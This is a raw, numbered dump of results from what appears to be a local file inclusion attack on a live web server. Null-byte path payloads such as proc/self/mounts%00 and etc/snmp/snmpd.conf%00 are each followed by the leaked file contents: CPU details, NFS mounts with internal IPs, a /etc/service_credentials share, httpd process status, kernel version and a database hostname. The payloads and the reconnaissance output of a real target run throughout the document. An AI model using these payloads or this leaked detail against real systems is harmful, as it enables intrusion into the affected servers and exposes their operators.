  685. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  686. bogomips : 5320.36
  687. clflush size : 64
  688. cache_alignment : 64
  689. address sizes : 40 bits physical, 48 bits virtual
  690. power management:
  691.  
  692. processor : 23
  693. vendor_id : GenuineIntel
  694. cpu family : 6
  695. model : 44
  696. model name : Intel(R) Xeon(R) CPU X5650 @ 2.67GHz
  697. stepping : 2
  698. cpu MHz : 2660.180
  699. cache size : 12288 KB
  700. physical id : 0
  701. siblings : 12
  702. core id : 10
  703. cpu cores : 6
  704. apicid : 21
  705. initial apicid : 21
  706. fpu : yes
  707. fpu_exception : yes
  708. cpuid level : 11
  709. wp : yes
  710. flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 sse4_2 popcnt aes lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid
  711. bogomips : 5319.81
  712. clflush size : 64
  713. cache_alignment : 64
  714. address sizes : 40 bits physical, 48 bits virtual
  715.  
  716. <b>Query Used: proc/self/mounts%00</b>rootfs / rootfs rw 0 0
  717. proc /proc proc rw,relatime 0 0
  718. sysfs /sys sysfs rw,seclabel,relatime 0 0
  719. devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
  720. devpts /dev/pts devpts rw,seclabel,relatime,gid=5,mode=620,ptmxmode=000 0 0
  721. tmpfs /dev/shm tmpfs rw,seclabel,relatime 0 0
  722. /dev/mapper/VolGroup00-LogVol01 / ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
  723. none /selinux selinuxfs rw,relatime 0 0
  724. devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
  725. /proc/bus/usb /proc/bus/usb usbfs rw,relatime 0 0
  726. /dev/sda1 /boot ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
  727. none /proc/sys/fs/binfmt_misc binfmt_misc rw,relatime 0 0
  728. sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
  729. netdata2nfs:/vol/www /www nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
  730. netdata2nfs:/vol/common /common nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
  731. netdata2nfs:/vol/cache /cache nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
  732. netdata1nfs:/vol/apps_data /www/apps-data nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  733. netdata2nfs:/vol/forecast /www/apps-data/gridpoint/ready nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.47 0 0
  734. netdata1nfs:/vol/radar /www/html/ridge nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  735. netdata1nfs:/vol/images /www/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  736. netdata1nfs:/vol/climate /www/html/climate nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  737. netdata1nfs:/vol/ahps /www/water nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.46 0 0
  738. netdata1nfs:/vol/share/etc/db /etc/db nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  739. netdata1nfs:/vol/share/etc/service_credentials /etc/service_credentials nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  740. netdata1nfs:/vol/nwschat /home/nwschat nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.46 0 0
  741. netdata2nfs:/vol/common/etc/pki/tls /etc/pki/tls nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
  742. netdata1nfs:/vol/gifs /www/gifs nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  743. netdata2nfs:/vol/www1 /www1 nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
  744. netdata1nfs:/vol/www1_images /www1/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  745. <b>Query Used: proc/self/status%00</b>Name: httpd
  746. State: R (running)
  747. Tgid: 9191
  748. Pid: 9191
  749. PPid: 5228
  750. TracerPid: 0
  751. Uid: 48 48 48 48
  752. Gid: 48 48 48 48
  753. Utrace: 0
  754. FDSize: 128
  755. Groups: 48
  756. VmPeak: 426820 kB
  757. VmSize: 420556 kB
  758. VmLck: 0 kB
  759. VmHWM: 44560 kB
  760. VmRSS: 40024 kB
  761. VmData: 32116 kB
  762. VmStk: 104 kB
  763. VmExe: 332 kB
  764. VmLib: 38136 kB
  765. VmPTE: 804 kB
  766. VmSwap: 836 kB
  767. Threads: 1
  768. SigQ: 0/1161533
  769. SigPnd: 0000000000000000
  770. ShdPnd: 0000000000000000
  771. SigBlk: 0000000000000000
  772. SigIgn: 0000000001001000
  773. SigCgt: 000000018c0046eb
  774. CapInh: 0000000000000000
  775. CapPrm: 0000000000000000
  776. CapEff: 0000000000000000
  777. CapBnd: ffffffffffffffff
  778. Cpus_allowed: ffffffff
  779. Cpus_allowed_list: 0-31
  780. Mems_allowed: 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003
  781. Mems_allowed_list: 0-1
  782. voluntary_ctxt_switches: 52112
  783. nonvoluntary_ctxt_switches: 956
  784. <b>Query Used: proc/self/stat%00</b>5824 (httpd) R 5336 5336 5336 0 -1 4202816 40863 19965 0 0 104 32 6 152 20 0 1 0 708449526 475176960 24466 18446744073709551615 140664139448320 140664139788020 140736967080416 140736967064728 140664112286128 0 0 16781312 201344747 0 0 0 17 5 0 0 683 0 0
  785. <b>Query Used: proc/self/mounts%00</b>rootfs / rootfs rw 0 0
  786. proc /proc proc rw,relatime 0 0
  787. sysfs /sys sysfs rw,seclabel,relatime 0 0
  788. devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
  789. devpts /dev/pts devpts rw,seclabel,relatime,gid=5,mode=620,ptmxmode=000 0 0
  790. tmpfs /dev/shm tmpfs rw,seclabel,relatime 0 0
  791. /dev/mapper/VolGroup00-LogVol01 / ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
  792. none /selinux selinuxfs rw,relatime 0 0
  793. devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
  794. /proc/bus/usb /proc/bus/usb usbfs rw,relatime 0 0
  795. /dev/sda1 /boot ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
  796. none /proc/sys/fs/binfmt_misc binfmt_misc rw,relatime 0 0
  797. sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
  798. netdata2nfs:/vol/www /www nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
  799. netdata2nfs:/vol/common /common nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
  800. netdata2nfs:/vol/cache /cache nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
  801. netdata1nfs:/vol/apps_data /www/apps-data nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  802. netdata2nfs:/vol/forecast /www/apps-data/gridpoint/ready nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.47 0 0
  803. netdata1nfs:/vol/radar /www/html/ridge nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  804. netdata1nfs:/vol/images /www/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  805. netdata1nfs:/vol/climate /www/html/climate nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  806. netdata1nfs:/vol/ahps /www/water nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.46 0 0
  807. netdata1nfs:/vol/share/etc/db /etc/db nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  808. netdata1nfs:/vol/share/etc/service_credentials /etc/service_credentials nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  809. netdata1nfs:/vol/nwschat /home/nwschat nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.46 0 0
  810. netdata2nfs:/vol/common/etc/pki/tls /etc/pki/tls nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
  811. netdata1nfs:/vol/gifs /www/gifs nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  812. netdata2nfs:/vol/www1 /www1 nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
  813. netdata1nfs:/vol/www1_images /www1/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
  814. <b>Query Used: etc/security/access.conf%00</b># Login access control table.
  815. #
  816. # Comment line must start with "#", no space at front.
  817. # Order of lines is important.
  818. #
  819. # When someone logs in, the table is scanned for the first entry that
  820. # matches the (user, host) combination, or, in case of non-networked
  821. # logins, the first entry that matches the (user, tty) combination. The
  822. # permissions field of that table entry determines whether the login will
  823. # be accepted or refused.
  824. #
  825. # Format of the login access control table is three fields separated by a
  826. # ":" character:
  827. #
  828. # [Note, if you supply a 'fieldsep=|' argument to the pam_access.so
  829. # module, you can change the field separation character to be
  830. # '|'. This is useful for configurations where you are trying to use
  831. # pam_access with X applications that provide PAM_TTY values that are
  832. # the display variable like "host:0".]
  833. #
  834. # permission : users : origins
  835. #
  836. # The first field should be a "+" (access granted) or "-" (access denied)
  837. # character.
  838. #
  839. # The second field should be a list of one or more login names, group
  840. # names, or ALL (always matches). A pattern of the form user@host is
  841. # matched when the login name matches the "user" part, and when the
  842. # "host" part matches the local machine name.
  843. #
  844. # The third field should be a list of one or more tty names (for
  845. # non-networked logins), host names, domain names (begin with "."), host
  846. # addresses, internet network numbers (end with "."), ALL (always
  847. # matches), NONE (matches no tty on non-networked logins) or
  848. # LOCAL (matches any string that does not contain a "." character).
  849. #
  850. # You can use @netgroupname in host or user patterns; this even works
  851. # for @usergroup@@hostgroup patterns.
  852. #
  853. # The EXCEPT operator makes it possible to write very compact rules.
  854. #
  855. # The group file is searched only when a name does not match that of the
  856. # logged-in user. Both the user's primary group is matched, as well as
  857. # groups in which users are explicitly listed.
  858. # To avoid problems with accounts, which have the same name as a group,
  859. # you can use brackets around group names '(group)' to differentiate.
  860. # In this case, you should also set the "nodefgroup" option.
  861. #
  862. # TTY NAMES: Must be in the form returned by ttyname(3) less the initial
  863. # "/dev" (e.g. tty1 or vc/1)
  864. #
  865. ##############################################################################
  866. #
  867. # Disallow non-root logins on tty1
  868. #
  869. #-:ALL EXCEPT root:tty1
  870. #
  871. # Disallow console logins to all but a few accounts.
  872. #
  873. #-:ALL EXCEPT wheel shutdown sync:LOCAL
  874. #
  875. # Same, but make sure that really the group wheel and not the user
  876. # wheel is used (use nodefgroup argument, too):
  877. #
  878. #-:ALL EXCEPT (wheel) shutdown sync:LOCAL
  879. #
  880. # Disallow non-local logins to privileged accounts (group wheel).
  881. #
  882. #-:wheel:ALL EXCEPT LOCAL .win.tue.nl
  883. #
  884. # Some accounts are not allowed to login from anywhere:
  885. #
  886. #-:wsbscaro wsbsecr wsbspac wsbsym wscosor wstaiwde:ALL
  887. #
  888. # All other accounts are allowed to login from anywhere.
  889. #
  890. ##############################################################################
  891. # All lines from here up to the end are building a more complex example.
  892. ##############################################################################
  893. #
  894. # User "root" should be allowed to get access via cron .. tty5 tty6.
  895. #+ : root : cron crond :0 tty1 tty2 tty3 tty4 tty5 tty6
  896. #
  897. # User "root" should be allowed to get access from hosts with ip addresses.
  898. #+ : root : 192.168.200.1 192.168.200.4 192.168.200.9
  899. #+ : root : 127.0.0.1
  900. #
  901. # User "root" should get access from network 192.168.201.
  902. # This term will be evaluated by string matching.
  903. # comment: It might be better to use network/netmask instead.
  904. # The same is 192.168.201.0/24 or 192.168.201.0/255.255.255.0
  905. #+ : root : 192.168.201.
  906. #
  907. # User "root" should be able to have access from domain.
  908. # Uses string matching also.
  909. #+ : root : .foo.bar.org
  910. #
  911. # User "root" should be denied to get access from all other sources.
  912. #- : root : ALL
  913. #
  914. # User "foo" and members of netgroup "nis_group" should be
  915. # allowed to get access from all sources.
  916. # This will only work if netgroup service is available.
  917. #+ : @nis_group foo : ALL
  918. #
  919. # User "john" should get access from ipv4 net/mask
  920. #+ : john : 127.0.0.0/24
  921. #
  922. # User "john" should get access from ipv4 as ipv6 net/mask
  923. #+ : john : ::ffff:127.0.0.0/127
  924. #
  925. # User "john" should get access from ipv6 host address
  926. #+ : john : 2001:4ca0:0:101::1
  927. #
  928. # User "john" should get access from ipv6 host address (same as above)
  929. #+ : john : 2001:4ca0:0:101:0:0:0:1
  930. #
  931. # User "john" should get access from ipv6 net/mask
  932. #+ : john : 2001:4ca0:0:101::/64
  933. #
  934. # All other users should be denied to get access from all sources.
  935. #- : ALL : ALL
  936. <b>Query Used: etc/ldap/ldap.conf%00</b>.<b>Query Used: proc/version%00</b>Linux version 2.6.32-279.1.1.el6.x86_64 (mockbuild@x86-003.build.bos.redhat.com) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Jun 20 11:41:22 EDT 2012
  937. <b>Query Used: etc/cups/printers.conf%00</b>.<b>Query Used: etc/cups/cupsd.conf.default%00</b>.<b>Query Used: etc/inetd.conf%00</b>.<b>Query Used: etc/apache2/conf.d%00</b>.<b>Query Used: etc/apache2/conf.d/security%00</b>.<b>Query Used: etc/samba/dhcp.conf%00</b>Array
  938. (
  939. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  940. Too many connections
  941. )
  942. <b>Query Used: etc/gconf%00</b>.<b>Query Used: proc/self/cmdline%00</b>/usr/sbin/httpd\00<b>Query Used: etc/irssi.conf%00</b>.<b>Query Used: etc/chkrootkit.conf%00</b>.<b>Query Used: etc/ufw/sysctl.conf%00</b>.<b>Query Used: etc/ufw/ufw.conf%00</b>Array
  943. (
  944. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  945. Too many connections
  946. )
  947. <b>Query Used: etc/syslog.conf%00</b>Array
  948. (
  949. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  950. Too many connections
  951. )
  952. <b>Query Used: etc/snmp/snmpd.conf%00</b>###############################################################################
  953. #
  954. # snmpd.conf:
  955. # An example configuration file for configuring the ucd-snmp snmpd agent.
  956. #
  957. ###############################################################################
  958. #
  959. # This file is intended to only be as a starting point. Many more
  960. # configuration directives exist than are mentioned in this file. For
  961. # full details, see the snmpd.conf(5) manual page.
  962. #
  963. # All lines beginning with a '#' are comments and are intended for you
  964. # to read. All other lines are configuration commands for the agent.
  965.  
  966. ###############################################################################
  967. # Access Control
  968. ###############################################################################
  969.  
  970. # As shipped, the snmpd demon will only respond to queries on the
  971. # system mib group until this file is replaced or modified for
  972. # security purposes. Examples are shown below about how to increase the
  973. # level of access.
  974.  
  975. # By far, the most common question I get about the agent is "why won't
  976. # it work?", when really it should be "how do I configure the agent to
  977. # allow me to access it?"
  978. #
  979. # By default, the agent responds to the "public" community for read
  980. # only access, if run out of the box without any configuration file in
  981. # place. The following examples show you other ways of configuring
  982. # the agent so that you can change the community names, and give
  983. # yourself write access to the mib tree as well.
  984. #
  985. # For more information, read the FAQ as well as the snmpd.conf(5)
  986. # manual page.
  987.  
  988. ####
  989. # First, map the community name "public" into a "security name"
  990.  
  991. # sec.name source community
  992. com2sec notConfigUser default public
  993.  
  994. ####
  995. # Second, map the security name into a group name:
  996.  
  997. # groupName securityModel securityName
  998. group notConfigGroup v1 notConfigUser
  999. group notConfigGroup v2c notConfigUser
  1000.  
  1001. ####
  1002. # Third, create a view for us to let the group have rights to:
  1003.  
  1004. # Make at least snmpwalk -v 1 localhost -c public system fast again.
  1005. # name incl/excl subtree mask(optional)
  1006. view systemview included .1.3.6.1.2.1.1
  1007. view systemview included .1.3.6.1.2.1.25.1.1
  1008.  
  1009. ####
  1010. # Finally, grant the group read-only access to the systemview view.
  1011.  
  1012. # group context sec.model sec.level prefix read write notif
  1013. access notConfigGroup "" any noauth exact systemview none none
  1014.  
  1015. # -----------------------------------------------------------------------------
  1016.  
  1017. # Here is a commented out example configuration that allows less
  1018. # restrictive access.
  1019.  
  1020. # YOU SHOULD CHANGE THE "COMMUNITY" TOKEN BELOW TO A NEW KEYWORD ONLY
  1021. # KNOWN AT YOUR SITE. YOU *MUST* CHANGE THE NETWORK TOKEN BELOW TO
  1022. # SOMETHING REFLECTING YOUR LOCAL NETWORK ADDRESS SPACE.
  1023.  
  1024. ## sec.name source community
  1025. #com2sec local localhost COMMUNITY
  1026. #com2sec mynetwork NETWORK/24 COMMUNITY
  1027.  
  1028. ## group.name sec.model sec.name
  1029. #group MyRWGroup any local
  1030. #group MyROGroup any mynetwork
  1031. #
  1032. #group MyRWGroup any otherv3user
  1033. #...
  1034.  
  1035. ## incl/excl subtree mask
  1036. #view all included .1 80
  1037.  
  1038. ## -or just the mib2 tree-
  1039.  
  1040. #view mib2 included .iso.org.dod.internet.mgmt.mib-2 fc
  1041.  
  1042.  
  1043. ## context sec.model sec.level prefix read write notif
  1044. #access MyROGroup "" any noauth 0 all none none
  1045. #access MyRWGroup "" any noauth 0 all all all
  1046.  
  1047.  
  1048. ###############################################################################
  1049. # Sample configuration to make net-snmpd RFC 1213.
  1050. # Unfortunately v1 and v2c don't allow any user based authentification, so
  1051. # opening up the default config is not an option from a security point.
  1052. #
  1053. # WARNING: If you uncomment the following lines you allow write access to your
  1054. # snmpd daemon from any source! To avoid this use different names for your
  1055. # community or split out the write access to a different community and
  1056. # restrict it to your local network.
  1057. # Also remember to comment the syslocation and syscontact parameters later as
  1058. # otherwise they are still read only (see FAQ for net-snmp).
  1059. #
  1060.  
  1061. # First, map the community name "public" into a "security name"
  1062. # sec.name source community
  1063. #com2sec notConfigUser default public
  1064.  
  1065. # Second, map the security name into a group name:
  1066. # groupName securityModel securityName
  1067. #group notConfigGroup v1 notConfigUser
  1068. #group notConfigGroup v2c notConfigUser
  1069.  
  1070. # Third, create a view for us to let the group have rights to:
  1071. # Open up the whole tree for ro, make the RFC 1213 required ones rw.
  1072. # name incl/excl subtree mask(optional)
  1073. #view roview included .1
  1074. #view rwview included system.sysContact
  1075. #view rwview included system.sysName
  1076. #view rwview included system.sysLocation
  1077. #view rwview included interfaces.ifTable.ifEntry.ifAdminStatus
  1078. #view rwview included at.atTable.atEntry.atPhysAddress
  1079. #view rwview included at.atTable.atEntry.atNetAddress
  1080. #view rwview included ip.ipForwarding
  1081. #view rwview included ip.ipDefaultTTL
  1082. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteDest
  1083. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex
  1084. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric1
  1085. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric2
  1086. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric3
  1087. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric4
  1088. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteType
  1089. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteAge
  1090. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMask
  1091. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric5
  1092. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex
  1093. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
  1094. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress
  1095. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType
  1096. #view rwview included tcp.tcpConnTable.tcpConnEntry.tcpConnState
  1097. #view rwview included egp.egpNeighTable.egpNeighEntry.egpNeighEventTrigger
  1098. #view rwview included snmp.snmpEnableAuthenTraps
  1099.  
  1100. # Finally, grant the group read-only access to the systemview view.
  1101. # group context sec.model sec.level prefix read write notif
  1102. #access notConfigGroup "" any noauth exact roview rwview none
  1103.  
  1104.  
  1105.  
  1106. ###############################################################################
  1107. # System contact information
  1108. #
  1109.  
  1110. # It is also possible to set the sysContact and sysLocation system
  1111. # variables through the snmpd.conf file:
  1112.  
  1113. syslocation Unknown (edit /etc/snmp/snmpd.conf)
  1114. syscontact Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
  1115.  
  1116. # Example output of snmpwalk:
  1117. # % snmpwalk -v 1 localhost -c public system
  1118. # system.sysDescr.0 = "SunOS name sun4c"
  1119. # system.sysObjectID.0 = OID: enterprises.ucdavis.ucdSnmpAgent.sunos4
  1120. # system.sysUpTime.0 = Timeticks: (595637548) 68 days, 22:32:55
  1121. # system.sysContact.0 = "Me <me@somewhere.org>"
  1122. # system.sysName.0 = "name"
  1123. # system.sysLocation.0 = "Right here, right now."
  1124. # system.sysServices.0 = 72
  1125.  
  1126.  
  1127. ###############################################################################
  1128. # Logging
  1129. #
  1130.  
  1131. # We do not want annoying "Connection from UDP: " messages in syslog.
  1132. # If the following option is commented out, snmpd will print each incoming
  1133. # connection, which can be useful for debugging.
  1134.  
  1135. dontLogTCPWrappersConnects yes
  1136.  
  1137. # -----------------------------------------------------------------------------
  1138.  
  1139.  
  1140. ###############################################################################
  1141. # Process checks.
  1142. #
  1143. # The following are examples of how to use the agent to check for
  1144. # processes running on the host. The syntax looks something like:
  1145. #
  1146. # proc NAME [MAX=0] [MIN=0]
  1147. #
  1148. # NAME: the name of the process to check for. It must match
  1149. # exactly (ie, http will not find httpd processes).
  1150. # MAX: the maximum number allowed to be running. Defaults to 0.
  1151. # MIN: the minimum number to be running. Defaults to 0.
  1152.  
  1153. #
  1154. # Examples (commented out by default):
  1155. #
  1156.  
  1157. # Make sure mountd is running
  1158. #proc mountd
  1159.  
  1160. # Make sure there are no more than 4 ntalkds running, but 0 is ok too.
  1161. #proc ntalkd 4
  1162.  
  1163. # Make sure at least one sendmail, but less than or equal to 10 are running.
  1164. #proc sendmail 10 1
  1165.  
  1166. # A snmpwalk of the process mib tree would look something like this:
  1167. #
  1168. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.2
  1169. # enterprises.ucdavis.procTable.prEntry.prIndex.1 = 1
  1170. # enterprises.ucdavis.procTable.prEntry.prIndex.2 = 2
  1171. # enterprises.ucdavis.procTable.prEntry.prIndex.3 = 3
  1172. # enterprises.ucdavis.procTable.prEntry.prNames.1 = "mountd"
  1173. # enterprises.ucdavis.procTable.prEntry.prNames.2 = "ntalkd"
  1174. # enterprises.ucdavis.procTable.prEntry.prNames.3 = "sendmail"
  1175. # enterprises.ucdavis.procTable.prEntry.prMin.1 = 0
  1176. # enterprises.ucdavis.procTable.prEntry.prMin.2 = 0
  1177. # enterprises.ucdavis.procTable.prEntry.prMin.3 = 1
